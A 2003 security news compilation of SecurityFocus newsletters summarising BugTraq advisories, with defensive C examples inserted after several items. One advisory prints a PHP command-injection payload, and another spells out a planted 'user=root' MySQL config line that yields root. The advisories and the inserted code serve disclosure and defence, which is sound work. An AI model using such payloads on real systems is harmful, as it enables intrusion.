[News:] GN SecNews #6
Vijay Kumar
Mar 25, 2003 18:26 PST
GN SecNews Vol #6
-----------------
News Article Type: Weekly
Author: vijay (vijay-@users.sourceforge.net)
Date: Mon Mar 24 07:47:09 IST 2003
Please send in your comments and suggestions for improvement.
Disclaimer: This is a compilation of Security News Articles/Advisories from various GNU/Linux Providers, Developers and Users. The Author(s) of this article makes no warranties of any kind whatsoever with respect to the information contained from the sources. The information given here is as is from the source with the PGP signature if available.
===============================================================================
Contents
========
1.) SecurityFocus Linux Newsletter #123
2.) SecurityFocus Newsletter #188
3.) [SECURITY] [DSA 258-1] New ethereal packages fix arbitrary code execution
4.) MySQL user can be changed to root
5.) [RHSA-2003:062-11] Updated OpenSSL packages fix timing attack
===============================================================================
1.) SecurityFocus Linux Newsletter #123
===============================================================================
SecurityFocus Linux Newsletter #123
-----------------------------------
I. FRONT AND CENTER
1. Open Source Honeypots, Part Two: Deploying Honeyd in the Wild
2. IP Spoofing: An Introduction
3. Iraqi Cyberwar: an Ageless Joke
4. SecurityFocus DPP Program
II. LINUX VULNERABILITY SUMMARY
1. SimpleBBS Users.php Insecure File Permissions Vulnerability
2. Ethereal SOCKS Dissector Format String Vulnerability
3. Ethereal NTLMSSP Dissector Heap Corruption Vulnerability
4. MySQL mysqld Privilege Escalation Vulnerability
5. PHP-Nuke Multiple SQL Injection Vulnerabilities
6. MySQL Control Center Insecure Default File Permission...
7. DeleGate HTTP Proxy Robot.TXT User-Agent: Buffer Overflow...
8. Multiple PHP-Nuke Forums/Private_Messages SQL Injection...
9. SaveMyModem Statusbar_Set_Text Buffer Overflow Vulnerability
10. Multiple Vendor 802.11b Authentication-Failed DOS...
11. GreyMatter WebLog Remote Command Execution Vulnerability
12. Man Program Unsafe Return Value Command Execution Vulnerability
13. Opera Long Filename Download Buffer Overrun Vulnerability
14. Qpopper Remote Memory Corruption Vulnerability
III. LINUX FOCUS LIST SUMMARY
1. Port 113 security (Thread)
2. Traffic Shaping. (Thread)
3. SecurityFocus Article Announcement (Thread)
IV. NEW PRODUCTS FOR LINUX PLATFORMS
1. EverLink SRAC Gateway
2. iChain
3. NetOp Remote Control
V. NEW TOOLS FOR LINUX PLATFORMS
1. eXtended Allow - Deny list for PAM v0.4
2. C-Kermit v8.0.208
3. trafcalc v1.0
I. FRONT AND CENTER
-------------------
1. Open Source Honeypots, Part Two: Deploying Honeyd in the Wild
By Lance Spitzner
This is the second part of a three-part series looking at Honeyd, the
open source honeypot. In this paper we will deploy Honeyd on the
Internet for one week and watch what happens. The intent is to test
Honeyd by letting real bad guys interact with and attack it. We will then
analyze how the honeypot performed and what it discovered.
http://www.securityfocus.com/infocus/1675
2. IP Spoofing: An Introduction
by Matthew Tanase
Criminals have long employed the tactic of masking their true identity,
from disguises to aliases to caller-id blocking. It should come as no
surprise then, that criminals who conduct their nefarious activities on
networks and computers should employ such techniques. IP spoofing is one
of the most common forms of on-line camouflage. In IP spoofing, an
attacker gains unauthorized access to a computer or a network by making
it appear that a malicious message has come from a trusted machine by
"spoofing" the IP address of that machine. In this article, we will
examine the concepts of IP spoofing: why it is possible, how it works,
what it is used for and how to defend against it.
http://www.securityfocus.com/infocus/1674
3. Iraqi Cyberwar: an Ageless Joke
By George Smith
Did U.S. infowar commandos smuggle a deadly computer virus into Iraq
inside a printer? Of course not. So why does it keep getting reported?
http://www.securityfocus.com/columnists/147
4. SecurityFocus DPP Program
Attention Universities!! Sign-up now for preferred pricing on the only
global early-warning system for cyber attacks - SecurityFocus DeepSight
Threat Management System.
Click here for more information:
http://www.securityfocus.com/corporate/products/dpsection.shtml
II. BUGTRAQ SUMMARY
-------------------
1. SimpleBBS Users.php Insecure File Permissions Vulnerability
BugTraq ID: 7045
Remote: Yes
Date Published: Mar 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7045
Summary:
SimpleBBS is a freely available, open source PHP Bulletin Board. It is
available for the Unix and Linux operating systems.
SimpleBBS reportedly creates the user database 'users.php' with
world-readable permissions in the SimpleBBS web root. User credentials
are stored in plain text format. As a result anyone who may have access
to the SimpleBBS website may view stored user information contained in
the SimpleBBS user database.
This vulnerability was reported for SimpleBBS 1.0.6. It is not known if
earlier versions are affected by this vulnerability.
2. Ethereal SOCKS Dissector Format String Vulnerability
BugTraq ID: 7049
Remote: Yes
Date Published: Mar 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7049
Summary:
Ethereal is a freely available, open source network traffic analysis
tool. It is maintained by the Ethereal Project and is available for most
Unix and Linux variants as well as Microsoft Windows operating systems.
The Ethereal SOCKS dissector is a mechanism for decoding the SOCKS
protocol. A format string vulnerability has been reported in some
versions of this dissector. The vulnerability exists in the
packet-socks.c source file.
An attacker can exploit this vulnerability by connecting to a vulnerable
SOCKS server and sending malicious format string specifiers to the SOCKS
server. If Ethereal is being used as a security tool to monitor network
packets, it is possible that sensitive memory may be corrupted.
This has been confirmed to result in a denial of service condition.
Additionally, it may be possible to cause Ethereal to execute malicious
attacker-supplied code.
This vulnerability affects Ethereal 0.9.9 and earlier.
3. Ethereal NTLMSSP Dissector Heap Corruption Vulnerability
BugTraq ID: 7050
Remote: Yes
Date Published: Mar 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7050
Summary:
Ethereal is a freely available, open source network traffic analysis
tool. It is maintained by the Ethereal Project and is available for most
Unix and Linux variants as well as Microsoft Windows operating systems.
The NTLMSSP (NTLM Security Support Provider) dissector is a mechanism for
evaluating packets that use the NTLM protocol. A heap corruption
vulnerability has been reported for some versions of the dissector.
The precise technical details of this vulnerability are currently
unknown. This BID will be updated as further information is available.
An attacker may be able to exploit this vulnerability by crafting a
specially formed packet and sending it to a system using the NTLMSSP
dissector or by convincing a victim user to use Ethereal to read a
malformed packet trace file.
Due to the nature of this vulnerability it may be possible for an
attacker to create a situation in which sensitive memory could be
overwritten. If successful this may allow for the execution of arbitrary
code with the privileges of the Ethereal process.
This vulnerability affects Ethereal 0.9.9 and earlier.
4. MySQL mysqld Privilege Escalation Vulnerability
BugTraq ID: 7052
Remote: Yes
Date Published: Mar 08 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7052
Summary:
MySQL is an open source relational database project. It is available for
the Microsoft Windows, Linux, and Unix operating systems.
A vulnerability has been discovered for MySQL that may allow the mysqld
service to start with elevated privileges.
MySQL uses a series of configuration files to set the privileges of the
service. The configuration files are typically stored in /etc/my.cnf,
DATADIR/my.cnf and ~/.my.cnf. When executed, the mysqld service reads
configuration information from /etc/my.cnf first, then DATADIR/my.cnf and
finally ~/.my.cnf.
An attacker can exploit this vulnerability by creating a DATADIR/my.cnf
that includes the line 'user=root' under the '[mysqld]' option section.
Furthermore, the ~/.my.cnf file must not exist.
When the mysqld service is executed, it will run as the root user instead
of the default user.
This may allow an attacker to obtain elevated privileges on a compromised
system.
This vulnerability was reported for MySQL 3.23.55.
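The advisory above turns on which option file wins when several set the [mysqld] user. The following is an added example, not the newsletter's or MySQL's code: a small checker that parses the three option files in the order the advisory gives (/etc/my.cnf, DATADIR/my.cnf, ~/.my.cnf), treats a later file as overriding an earlier one (an assumption taken from that reading order), and reports which file set the effective user and whether it is root. The file contents are constructed samples passed in as strings, so it runs without touching a real installation; the "DATADIR/my.cnf" path is a placeholder for the real data directory.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_VAL 64

/* An option file as the checker sees it: text == NULL means the file is absent. */
struct optfile { const char *path; const char *text; };

/* Strip leading and trailing whitespace in place; returns a pointer into s. */
static char *trim(char *s) {
    char *e;
    while (isspace((unsigned char)*s)) s++;
    e = s + strlen(s);
    while (e > s && isspace((unsigned char)e[-1])) *--e = '\0';
    return s;
}

/* Scan one option file for "user=..." inside the [mysqld] group. The last
 * assignment seen is copied (bounded) into out; returns 1 if one was found. */
int mysqld_user_in(const char *text, char *out, size_t outlen) {
    const char *p = text;
    int in_mysqld = 0, found = 0;
    while (*p) {
        char line[256], *l, *eq;
        size_t full = strcspn(p, "\n");
        size_t n = full < sizeof line ? full : sizeof line - 1;
        memcpy(line, p, n);
        line[n] = '\0';
        p += full;
        if (*p == '\n') p++;
        l = trim(line);
        if (*l == '\0' || *l == '#' || *l == ';') continue;   /* blank or comment */
        if (*l == '[') {                                      /* group header */
            in_mysqld = strcmp(l, "[mysqld]") == 0;
            continue;
        }
        if (!in_mysqld || (eq = strchr(l, '=')) == NULL) continue;
        *eq = '\0';
        if (strcmp(trim(l), "user") == 0) {
            snprintf(out, outlen, "%s", trim(eq + 1));
            found = 1;
        }
    }
    return found;
}

/* Walk the option files in read order; a later file overrides an earlier one
 * (assumed from the order the advisory describes). Returns the index of the
 * file whose setting wins, or -1 if no file sets a [mysqld] user. */
int effective_mysqld_user(const struct optfile *files, int nfiles,
                          char *out, size_t outlen) {
    int i, winner = -1;
    for (i = 0; i < nfiles; i++)
        if (files[i].text && mysqld_user_in(files[i].text, out, outlen))
            winner = i;
    return winner;
}

/* Constructed samples. PLANTED matches the advisory's scenario: /etc/my.cnf names
 * a dedicated account, DATADIR/my.cnf carries user=root, ~/.my.cnf is absent. */
static const struct optfile PLANTED[3] = {
    { "/etc/my.cnf",    "[client]\nport=3306\n[mysqld]\nuser=mysql\ndatadir=/var/lib/mysql\n" },
    { "DATADIR/my.cnf", "[mysqld]\n# constructed: planted in the data directory\nuser = root\n" },
    { "~/.my.cnf",      NULL },
};
static const struct optfile CLEAN[3] = {
    { "/etc/my.cnf",    "[mysqld]\nuser=mysql\n" },
    { "DATADIR/my.cnf", "[mysqld]\nskip-networking\n" },   /* no user override */
    { "~/.my.cnf",      NULL },
};

int resolve_index(const struct optfile *files) {
    char u[MAX_VAL];
    return effective_mysqld_user(files, 3, u, sizeof u);
}

int resolve_is_root(const struct optfile *files) {
    char u[MAX_VAL];
    return effective_mysqld_user(files, 3, u, sizeof u) >= 0 && strcmp(u, "root") == 0;
}

int main(void) {
    char u[MAX_VAL];
    int w = effective_mysqld_user(PLANTED, 3, u, sizeof u);
    if (w < 0) puts("no option file sets a [mysqld] user");
    else printf("effective mysqld user: %s (set by %s)\n", u, PLANTED[w].path);
    if (resolve_is_root(PLANTED)) puts("WARNING: mysqld would start as root");
    return 0;
}
```

The useful operational check is the second half: an option file in a directory writable by the service account should never be allowed to raise the user above that account, so the checker flags any winning file other than /etc/my.cnf that sets user=root.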
5. PHP-Nuke Multiple SQL Injection Vulnerabilities
BugTraq ID: 7031
Remote: Yes
Date Published: Mar 06 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7031
Summary:
PHP-Nuke is a web-based portal system. Implemented in PHP, it is
available for a range of systems, including Unix, Linux, and Microsoft
Windows.
Multiple SQL injection vulnerabilities were reported in the
'Members_List' and 'Your_Account' modules of PHP-Nuke. This is due to
insufficient sanitization of externally supplied data which is used to
construct SQL queries. This data may be supplied via URI parameters in
requests for certain module functions. A remote attacker may take
advantage of these issues to inject malicious data into SQL queries,
possibly resulting in modification of query logic.
The consequences may vary depending on the particular database
implementation and the nature of the specific queries. At the very
least, it is possible to compromise the PHP-Nuke web portal. SQL
injection also makes it possible, under some circumstances, to exploit
vulnerabilities that may exist in the database implementation.
This BID will be divided into separate BIDs for each distinct issue and
retired when further analysis of these vulnerabilities is complete.
6. MySQL Control Center Insecure Default File Permission Vulnerability
BugTraq ID: 7041
Remote: No
Date Published: Mar 07 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7041
Summary:
MySQL Control Center (MySQLCC) is a visual administration interface for
MySQL database servers and is available for multiple platforms.
A vulnerability has been discovered in MySQLCC. The problem lies in the
permissions set on various files used by MySQLCC. Specifically,
configuration and connection files used by the application are set
world-readable. This may allow a malicious local user to obtain access to
sensitive information regarding various MySQL configuration settings.
Access to these files may allow an attacker to obtain information
required to carry out further attacks against a target system.
This issue has been addressed in MySQLCC 0.8.9.
7. DeleGate HTTP Proxy Robot.TXT User-Agent: Buffer Overflow Vulnerability
BugTraq ID: 7054
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7054
Summary:
DeleGate is an open source proxy server developed by Yutaka Sato.
DeleGate allows for proxying of several application protocols, including
HTTP. It is available for multiple platforms, including Microsoft
Windows and Unix and Linux variants.
The DeleGate HTTP Proxy component is prone to a remotely exploitable
buffer overflow vulnerability. This is due to insufficient bounds
checking of User-Agent: fields in remote 'robot.txt' files. It is
reported that it is possible to trigger this issue by specifying multiple
lines of User-Agent: data in the file, which will cause an internal array
of pointers to be overflowed with attacker-supplied data. This will
occur when a malicious 'robot.txt' file is retrieved via the proxy.
Successful exploitation may result in execution of malicious code in the
security context of the DeleGate proxy server.
This issue was reported in DeleGate versions 8.3.4 and 8.4.0. Other
versions may also be affected.
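The DeleGate issue above is a missing count check on a fixed table of pointers filled from User-Agent: lines. As an added example (not DeleGate's code, and the table size MAX_AGENTS is an arbitrary assumption), here is a robots.txt reader that collects those values with the bounds check in place, refusing a body that carries more User-Agent lines than the table holds instead of writing past it. The sample bodies are constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_AGENTS 8     /* assumed table size for this example */
#define MAX_LINE   256

struct robots { char *agents[MAX_AGENTS]; int count; };

/* Case-insensitive prefix test: robots.txt field names are case-insensitive. */
static int has_prefix_ci(const char *s, const char *prefix) {
    for (; *prefix; s++, prefix++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix)) return 0;
    return 1;
}

static char *dup_str(const char *s) {
    size_t n = strlen(s) + 1;
    char *d = malloc(n);
    if (d) memcpy(d, s, n);
    return d;
}

void robots_free(struct robots *r) {
    int i;
    for (i = 0; i < r->count; i++) free(r->agents[i]);
    r->count = 0;
}

/* Collect every User-Agent: value into r->agents. Returns the count, or -1 if
 * the body carries more User-Agent lines than the table holds (or on OOM);
 * on -1 the table is left empty so the caller cannot use partial data. */
int parse_robots_agents(const char *body, struct robots *r) {
    const char *p = body;
    r->count = 0;
    while (*p) {
        char line[MAX_LINE];
        const char *v;
        size_t full = strcspn(p, "\r\n");
        size_t n = full < sizeof line ? full : sizeof line - 1;   /* bounded copy */
        memcpy(line, p, n);
        line[n] = '\0';
        p += full;
        while (*p == '\r' || *p == '\n') p++;
        if (!has_prefix_ci(line, "user-agent:")) continue;
        v = line + 11;
        while (*v == ' ' || *v == '\t') v++;
        if (r->count >= MAX_AGENTS) {   /* the check the advisory says was missing */
            robots_free(r);
            return -1;
        }
        r->agents[r->count] = dup_str(v);
        if (!r->agents[r->count]) { robots_free(r); return -1; }
        r->count++;
    }
    return r->count;
}

/* Constructed sample body (not from any real site). */
static const char NORMAL[] =
    "User-Agent: *\r\nDisallow: /private/\r\n\r\n"
    "user-agent: Googlebot\r\nDisallow:\r\n";

int normal_count(void) {
    struct robots r;
    int n = parse_robots_agents(NORMAL, &r);
    robots_free(&r);
    return n;
}

int normal_second_is_googlebot(void) {
    struct robots r;
    int ok = parse_robots_agents(NORMAL, &r) == 2 && strcmp(r.agents[1], "Googlebot") == 0;
    robots_free(&r);
    return ok;
}

/* Constructed body with one more User-Agent line than the table holds. */
int flood_result(void) {
    char body[(MAX_AGENTS + 1) * 16 + 1] = "";
    struct robots r;
    int i, n;
    for (i = 0; i <= MAX_AGENTS; i++) strcat(body, "User-Agent: x\n");
    n = parse_robots_agents(body, &r);
    robots_free(&r);
    return n;
}

int main(void) {
    printf("normal body: %d agents; flooded body: %d\n", normal_count(), flood_result());
    return 0;
}
```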
8. Multiple PHP-Nuke Forums/Private_Messages SQL Injection Vulnerabilities
BugTraq ID: 7060
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7060
Summary:
PHP-Nuke is a web-based portal system. Implemented in PHP, it is
available for a range of systems, including Unix, Linux, and Microsoft
Windows.
Multiple SQL injection vulnerabilities were reported in the Forums
scripts and 'Private_Messages' module of PHP-Nuke. This is due to
insufficient sanitization of externally supplied data which is used to
construct SQL queries. This data may be supplied via URI parameters in
requests for certain functions. A remote attacker may take advantage of
these issues to inject malicious data into SQL queries, possibly
resulting in modification of query logic.
The consequences may vary depending on the particular database
implementation and the nature of the specific queries. At the very
least, it is possible to compromise the PHP-Nuke web portal. SQL
injection also makes it possible, under some circumstances, to exploit
vulnerabilities that may exist in the database implementation.
This BID will be divided into separate BIDs for each distinct issue and
retired when further analysis of these vulnerabilities is complete.
9. SaveMyModem Statusbar_Set_Text Buffer Overflow Vulnerability
BugTraq ID: 7068
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7068
Summary:
SaveMyModem is mail filtering software. It is available for Microsoft
Windows and Unix and Linux platforms.
SaveMyModem is prone to a buffer overflow in the 'statusbar_set_text'
function. In some instances, this function will be called with
externally supplied data, such as when messages are processed. The
vulnerable function includes a call to vsnprintf(), specifying a source
buffer that is much larger than the destination buffer.
When the vulnerable function is called with externally supplied data, it
may be possible to corrupt sensitive regions of data. This may
potentially occur if a message is processed with an excessively long
subject.
Successful exploitation will result in code execution in the context of
the SaveMyModem process.
10. Multiple Vendor 802.11b Authentication-Failed Denial Of Service Vulnerability
BugTraq ID: 7069
Remote: Yes
Date Published: Mar 11 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7069
Summary:
A vulnerability has been reported in some operating systems that are
capable of handling 802.11b traffic. This issue has been reported as
affecting Linux and Microsoft Windows operating systems.
Some operating systems do not handle specific types of 802.11b traffic
properly. Upon receiving maliciously crafted packets, the client driver
may drop all active sessions and fail. A reboot may be required to
resume normal functionality.
The problem is in the handling of Authentication-Failed packets. By
sending an Authentication-Failed packet to a host with a reason code
referring to an authentication failure that has previously occurred, a
host may react unpredictably, dropping all sessions, and the client
software may fail. It should be noted that the source and destination MAC
addresses of the Authentication-Failed packets are spoofed to appear as
though their origin is the Wireless Access Point.
The attack is typically performed by sending the packets directly to a
802.11b client. Therefore, this type of attack will evade network
intrusion detection, and may additionally circumvent WEP.
11. GreyMatter WebLog Remote Command Execution Vulnerability
BugTraq ID: 7055
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7055
Summary:
GreyMatter WebLog is an open source weblog software package available for
the Unix and Linux operating systems.
A problem in the software may allow unauthorized access to systems using
the vulnerable software.
It has been reported that a problem in GreyMatter weblog may allow
unauthorized access to systems. Due to improper sanitization of
untrusted input, it may be possible for a remote user to execute commands
on the local system.
The problem is in the handling of user comments by the weblog software.
Due to improper sanitization of the input passed through the weblog
comments fields, an attacker could potentially insert specially crafted
commands such as <?php system(echo($cmd)) ?>. This would in turn result
in the execution of these commands with the privileges of the web server
process.
12. Man Program Unsafe Return Value Command Execution Vulnerability
BugTraq ID: 7066
Remote: No
Date Published: Mar 11 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7066
Summary:
Man is a freely available, open source manual page program. It is
available mainly for Linux operating systems, though it can be used on
other UNIX operating system variants.
A problem with the program may make it possible to launch local attacks
on users through malicious man pages.
It has been reported that the man program does not properly handle some
types of input. When a man page is processed that could pose a potential
security risk, the program reacts in a way that may open a window of
opportunity for an attacker to execute arbitrary commands.
The problem is in the value returned by the man program when a
potentially dangerous man page is processed. The man program returns the
string 'unsafe' which is in turn passed to a system() call. If a program
located in the user's path was named 'unsafe' the program would be
executed with the privileges of the man program user.
13. Opera Long Filename Download Buffer Overrun Vulnerability
BugTraq ID: 7056
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7056
Summary:
Opera is a web browser available for a number of platforms, including
Microsoft Windows, Linux and Unix variants and Apple MacOS.
A vulnerability has been discovered in various versions of Opera on the
Microsoft Windows platform.
When specific types of files are downloaded by Opera, the transfer is
displayed within a 'Download Dialog'. Due to insufficient bounds checking
when processing the requested filename, it may be possible for memory to
be corrupted.
Specifically, when a filename is to be displayed within the 'Download
Dialog' the type of file must be verified. When this occurs, the filename
in question is copied into a static buffer on the stack.
By hosting a downloadable file containing a name of excessive length, it
may be possible for an attacker to overwrite sensitive memory locations
within Opera. Successful exploitation of this issue would result in the
execution of arbitrary attacker-supplied commands.
It should be noted that this issue affects Opera versions 6 and 7 on the
Microsoft Windows platform.
14. Qpopper Remote Memory Corruption Vulnerability
BugTraq ID: 7058
Remote: Yes
Date Published: Mar 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/7058
Summary:
Qpopper is a POP3 mail server available for Linux and Unix based systems.
A vulnerability has been discovered when calling the 'mdef' command. The
issue stems from an incorrect assumption about the behaviour of the
Qvsnprintf() function. The function is meant to be a replacement for the
C function vsnprintf() but, unlike the latter function, Qvsnprintf()
fails to NULL terminate buffers.
A memory corruption vulnerability has been discovered in Qpopper when
processing a malicious 'mdef' command, as a result of the lack of NULL
termination by Qvsnprintf(). The vulnerability specifically occurs in the
pop_msg() function when filling the 'message' buffer with a user-supplied
macro name. The pop_msg() function incorrectly assumes that the 'message'
buffer will be null terminated after being filled via the Qvsnprintf()
function. A CRLF sequence and null terminator (CRLF+N) is later appended
to the data which may overwrite memory at a location adjacent to the
buffer.
By exploiting this to overwrite the LSB of a saved frame pointer, it is
possible to influence the program in such a way that attacker-supplied
instructions can be executed.
This vulnerability affects Qpopper versions 4.0.4 and earlier. It should
be noted that the exploitability of this issue is highly dependent on the
memory layout, which will likely be influenced by compiler optimization.
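Items 9 (SaveMyModem) and 14 (Qpopper) above are two faces of the same caller-side mistake: a formatting call whose return value and termination behaviour are not checked before the buffer is used further. The following is an added example, not Qpopper's or SaveMyModem's code. model_qvsnprintf is a constructed stand-in for a formatter that writes no terminator when the text does not fit (the behaviour the Qpopper advisory attributes to Qvsnprintf); build_reply shows the checks a pop_msg-style routine needs before appending CRLF, and build_reply_with_model shows how to stay safe if such a non-terminating formatter must be used. The "-ERR unknown macro %s" reply text is an assumption for illustration.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of a non-terminating vsnprintf replacement: copies at most
 * n bytes and writes a NUL only when the whole text fits. Returns the length
 * the full text would have had, like vsnprintf. */
int model_qvsnprintf(char *dst, size_t n, const char *fmt, ...) {
    char tmp[1024];
    va_list ap;
    size_t copy;
    int len;
    va_start(ap, fmt);
    len = vsnprintf(tmp, sizeof tmp, fmt, ap);
    va_end(ap);
    if (len < 0) return len;
    copy = (size_t)len < n ? (size_t)len : n;
    memcpy(dst, tmp, copy);
    if ((size_t)len < n) dst[len] = '\0';   /* terminator only when it fits */
    return len;
}

/* Hardened pop_msg-style helper using the standard, always-terminating
 * snprintf: reject truncation and append CRLF only if it fits with the NUL.
 * Returns the final length or -1 if the reply would not fit. */
int build_reply(char *message, size_t size, const char *macro) {
    int len;
    if (size < 3) return -1;
    len = snprintf(message, size, "-ERR unknown macro %s", macro);
    if (len < 0 || (size_t)len >= size) {   /* truncated: do not use the buffer */
        message[0] = '\0';
        return -1;
    }
    if ((size_t)len + 2 >= size) return -1;  /* no room for "\r\n" plus NUL */
    memcpy(message + len, "\r\n", 3);        /* the 3rd byte is the terminator */
    return len + 2;
}

/* Same contract when only a non-terminating formatter is available: force a
 * terminator at the end and treat len >= size as truncation before anything
 * else reads or appends to the buffer. */
int build_reply_with_model(char *message, size_t size, const char *macro) {
    int len;
    if (size < 3) return -1;
    len = model_qvsnprintf(message, size, "-ERR unknown macro %s", macro);
    message[size - 1] = '\0';
    if (len < 0 || (size_t)len >= size) return -1;
    if ((size_t)len + 2 >= size) return -1;
    memcpy(message + len, "\r\n", 3);
    return len + 2;
}

#define MSG 32

/* Shows the hazard: after an over-long write the 32-byte buffer holds no NUL,
 * so any later strlen/strcat walks past it. Returns 1 if no terminator found. */
int model_leaves_unterminated(void) {
    char buf[MSG];
    memset(buf, 'A', sizeof buf);
    model_qvsnprintf(buf, sizeof buf, "%s", "0123456789012345678901234567890123456789");
    return memchr(buf, '\0', sizeof buf) == NULL;
}

int reply_fits(void)           { char m[MSG]; return build_reply(m, sizeof m, "ab"); }
int reply_overlong(void)       { char m[MSG]; return build_reply(m, sizeof m, "averyveryverylongmacroname"); }
int reply_edge_fits(void)      { char m[MSG]; return build_reply(m, sizeof m, "0123456789"); }
int reply_edge_overflows(void) { char m[MSG]; return build_reply(m, sizeof m, "01234567890"); }
int model_reply_fits(void)     { char m[MSG]; return build_reply_with_model(m, sizeof m, "ab"); }
int model_reply_overlong(void) { char m[MSG]; return build_reply_with_model(m, sizeof m, "averyveryverylongmacroname"); }

int main(void) {
    printf("unterminated after overflow: %d\n", model_leaves_unterminated());
    printf("short macro -> %d, long macro -> %d\n", reply_fits(), reply_overlong());
    return 0;
}
```

The edge cases are the ones worth keeping in mind: a reply of 29 characters plus CRLF fills a 32-byte buffer exactly and is accepted, one character more is refused, because the comparison counts the terminator that the later memcpy writes.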
III. LINUX FOCUS LIST SUMMARY
----------------------------
1. Port 113 security (Thread)
Relevant URL:
http://online.securityfocus.com/archive/91/314827
2. Traffic Shaping. (Thread)
Relevant URL:
http://online.securityfocus.com/archive/91/314730
3. SecurityFocus Article Announcement (Thread)
Relevant URL:
http://online.securityfocus.com/archive/91/314566
IV. NEW PRODUCTS FOR LINUX PLATFORMS
------------------------------------
1. EverLink SRAC Gateway
by Anyware Technology
Platforms: N/A
Relevant URL:
http://www.anywareusa.com/products/srac_gateway.htm
Summary:
EverLink SRAC Gateway is a high performance network appliance that
integrates many security technologies into a simple network device.
Operating at the application layer, the Gateway allows enterprises to
build fully secured Virtual Private Network as easy as PLUG AND PLAY. By
incorporating all authentication methods, including PKI and dynamic
password, the Gateway provides the most thorough check of a user's
identity. For those who have installed VPNs, the Gateway provides
enterprises with significant added functionalities and security features
to instantly accommodate mobile users anywhere in the world.
2. iChain
by Novell
Platforms: N/A
Relevant URL:
http://www.novell.com/products/ichain/
Summary:
iChain provides identity-based web security services that control access
to application and network resources across technical and organizational
boundaries, as one Net.
3. NetOp Remote Control
by CrossTec Corporation
Platforms: DOS, Linux, OS/2, Windows 2000, Windows 95/98, Windows CE,
Windows NT, Windows XP
Relevant URL:
http://www.crossteccorp.com/netopremote/index.html
Summary:
With New NetOp Remote Control v7.5 you can easily reach any Windows,
Linux, Sun Solaris or legacy OS/2 and DOS PC from your desktop or even
via any Internet connected PC via our new IE browser Guest. View the
remote PC's screen, control its keyboard and mouse, synchronize files,
inventory its hardware and software, launch applications or chat with
someone at the remote PC -- just as if you were seated at that computer.
V. NEW TOOLS FOR LINUX PLATFORMS
---------------------------------
1. eXtended Allow - Deny list for PAM v0.4
by Adrian Ber berad-@yahoo.com
Relevant URL:
http://www.geocities.com/beradrian/soft/xad/index.html
Platforms: Linux, POSIX
Summary:
XAD is a very easy to configure PAM module. Through a very easy language
you can allow/deny access to users.
2. C-Kermit v8.0.208
by Frank da Cruz
Relevant URL:
http://www.columbia.edu/kermit/ckermit.html
Platforms: AIX, FreeBSD, HP-UX, Linux, MacOS, NetBSD, OpenBSD, SCO,
Solaris, SunOS
Summary:
C-Kermit is a combined serial and network communication software package
offering a consistent, medium-independent, cross-platform approach to
connection establishment, terminal sessions, file transfer, character-set
translation, numeric and alphanumeric paging, and automation of
communication tasks. Recent versions include FTP and HTTP clients as well
as an SSH interface, all of which can be scripted and aware of
character-sets. It supports built-in security methods, including Kerberos
IV, Kerberos V, SSL/TLS, and SRP, FTP protocol features such as MLSD, and
source-code parity with Kermit 95 2.1 for Windows and OS/2.
3. trafcalc v1.0
by cyberny
Relevant URL:
http://trafcalc.sourceforge.net/
Platforms: Linux, POSIX
Summary:
Trafcalc calculates the size of the TCP-payload on a system via packet
capturing and connection tracking at the user level instead of the IP
level.
===============================================================================
End of Doc #1
===============================================================================
===============================================================================
2.) SecurityFocus Newsletter #188
===============================================================================
SecurityFocus Newsletter #188
-----------------------------
This Issue is Sponsored By: NetIQ
Need security policies? Don't start from scratch..."Information Security
Policies Made Easy" is the best security policy resource guide you can
buy with 1300+ ready-to-use security policies that can be quickly
customized for any company. Build best practice security policies in
half the time and expense. Also check out "Information Security Roles &
Responsibilities Made Easy. "
Download a free policy now at http://www.netiq.com/order/publications.asp
------------------------------------------------------------------------------
I. FRONT AND CENTER
1. Open Source Honeypots, Part Two: Deploying Honeyd in the Wild
2. IP Spoofing: An Introduction
3. Iraqi Cyberwar: an Ageless Joke
4. SecurityFocus DPP Program
II. BUGTRAQ SUMMARY
1. DBTools DBManager Professional Information Disclosure Weakness
2. MySQL Control Center Insecure Default File Permission...
3. NetScreen ScreenOS Loss of Configuration Vulnerability
4. Wordit Logbook Logbook.pl Remote Command Execution Vulnerability
5. Clearswift MailSweeper Malformed MIME Attachment Filter Bypass...
6. SimpleBBS Users.php Insecure File Permissions Vulnerability
7. Microsoft Windows XP Safe Mode Policy Bypass Weakness
8. PostNuke Phoenix Member_List Module SQL Injection Vulnerability
9. PostNuke Phoenix Theme Handling Remote Code Execution...
10. Ethereal SOCKS Dissector Format String Vulnerability
11. Ethereal NTLMSSP Dissector Heap Corruption Vulnerability
12. Upload Lite Arbitrary File Upload Vulnerability
13. MySQL mysqld Privilege Escalation Vulnerability
14. PeopleSoft PeopleTools SchedulerTransfer Remote Command
15. GreyMatter WebLog Remote Command Execution Vulnerability
16. Microsoft Internet Explorer .MHT File Buffer Overflow...
17. DeleGate HTTP Proxy Robot.TXT User-Agent: Buffer Overflow...
18. Opera Long Filename Download Buffer Overrun Vulnerability
19. Qpopper Remote Memory Corruption Vulnerability
20. SMC Router Backup Tool Plaintext Password Weakness
21. LXR Cross-Referencer Arbitrary File Disclosure Vulnerability
22. Multiple PHP-Nuke Forums/Private_Messages SQL Injection...
23. VPOPMail vpopmail.php Remote Command Execution Vulnerability
24. HP VVOS 11.04 HFS Unauthorized Access Vulnerability
